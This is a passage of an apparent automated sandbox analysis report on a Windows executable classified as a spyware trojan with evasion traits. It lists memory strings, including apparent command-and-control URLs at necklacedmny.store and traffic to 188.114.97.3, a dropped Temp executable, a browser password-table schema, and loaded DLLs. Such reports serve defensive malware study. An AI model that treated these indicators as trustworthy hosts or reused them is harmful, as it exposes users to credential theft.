          Source: file.exe, 00000000.00000003.1492508227.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521685992.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/Feb
          Source: file.exe, 00000000.00000003.1517438530.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521685992.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/Xf
          Source: file.exe, 00000000.00000003.1516998293.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1528854047.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1517530592.000000000156B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
          Source: file.exe, 00000000.00000003.1528854047.0000000001569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api2
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiK
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiQ
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiv
          Source: file.exe, 00000000.00000003.1516998293.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1528854047.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521751055.000000000156B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1517530592.000000000156B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api~
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/nm
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49788 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49799 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49840 version: TLS 1.2

          System Summary

          barindex
          PE file contains section with special chars
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .rsrc
          Source: file.exeStatic PE information: section name: .idata
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name:
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name: .idata
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD78F3_2_009BD78F
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD7BA3_2_009BD7BA
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BDC043_2_009BDC04
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009C4C4D3_2_009C4C4D
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe 786815EEFC4562898758FB1D07EE126AB4A887DBAACD98C37C5FAF367D2CD3E1
          Source: file.exe, 00000000.00000003.1587702828.0000000005FB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1598663364.0000000006266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587782444.0000000006158000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593862063.00000000062EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600877406.00000000063AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1597063980.0000000006246000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594334611.000000000622D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1598524532.0000000006161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599241792.0000000006358000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1598959056.0000000006255000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1605309940.0000000006153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599842875.0000000006152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587248903.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1595629132.000000000631F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1602174542.00000000063CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593642310.0000000006155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1603091811.00000000063CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587476608.0000000005FB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1601500303.0000000006160000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587329787.0000000005FBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594083269.000000000622C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593310463.000000000615B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593752784.0000000006220000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600385896.0000000006152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599375054.0000000006154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1588043496.00000000061F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592523212.000000000615A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1591168543.00000000061FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1601231712.0000000006287000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592742926.00000000062CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1597201977.000000000633E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596372494.000000000615F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1609418744.0000000001577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587958643.0000000006158000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1602385713.0000000006159000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596791016.0000000006248000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599937829.0000000006263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600170721.000000000626B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1595278768.000000000615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1598799120.0000000006156000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593204707.0000000006220000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592107701.000000000615C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1603499907.000000000629C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1609324887.0000000001561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1605153373.0000000006400000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1597619586.0000000006159000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1603845603.0000000006295000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1604992355.00000000062A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1604022176.0000000006153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1602537903.0000000006284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600508422.000000000627F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594823758.000000000615A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1608753389.0000000005D25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596089191.000000000623D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594551983.0000000006226000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596235721.0000000006328000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596507359.0000000006246000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587553969.0000000006152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587412848.000000000615A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596925592.000000000615D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1604762765.0000000006157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1608828082.0000000005DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593419611.000000000621A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1601039126.0000000006160000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1603289607.000000000615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1596644951.0000000006155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1595826762.0000000006157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592274520.0000000006202000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587617140.00000000061F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593095917.000000000615B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1597770950.0000000006256000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1588227022.00000000061F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1602929646.000000000628F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1604335427.000000000629F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594674814.0000000006300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1595439678.000000000623B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600263998.000000000638D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1607854521.0000000006416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1587868708.00000000061F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599504802.000000000626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600632361.0000000006157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1608933732.0000000005CB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1602758793.0000000006155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592854005.000000000615A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599629402.000000000615B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1591054745.0000000006157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1599725104.000000000626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1602006950.000000000628E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1590544130.000000000629C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1601852335.0000000006156000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1604603050.00000000063E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1597348222.0000000006159000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593972663.000000000615A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1597486916.0000000006256000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594442874.0000000006155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1594197330.000000000615D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1598133295.0000000006361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1588130892.0000000006155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1603706198.0000000006156000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592635918.000000000620F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1593531289.00000000062DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1591843220.00000000062B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1592987887.0000000006216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1601664608.0000000006290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1595002083.0000000006237000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600054222.0000000006152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1600754849.000000000627E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9980346297021944
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@6/2
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7V52BG1QZHX6WU0LEYA.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeMutant created: NULL
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.1463565779.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409443347.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410146237.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1463767695.0000000001574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 7V52BG1QZHX6WU0LEYA.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
          Source: 7V52BG1QZHX6WU0LEYA.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: file.exeString found in binary or memory: |z9RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeQ
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe "C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe "C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
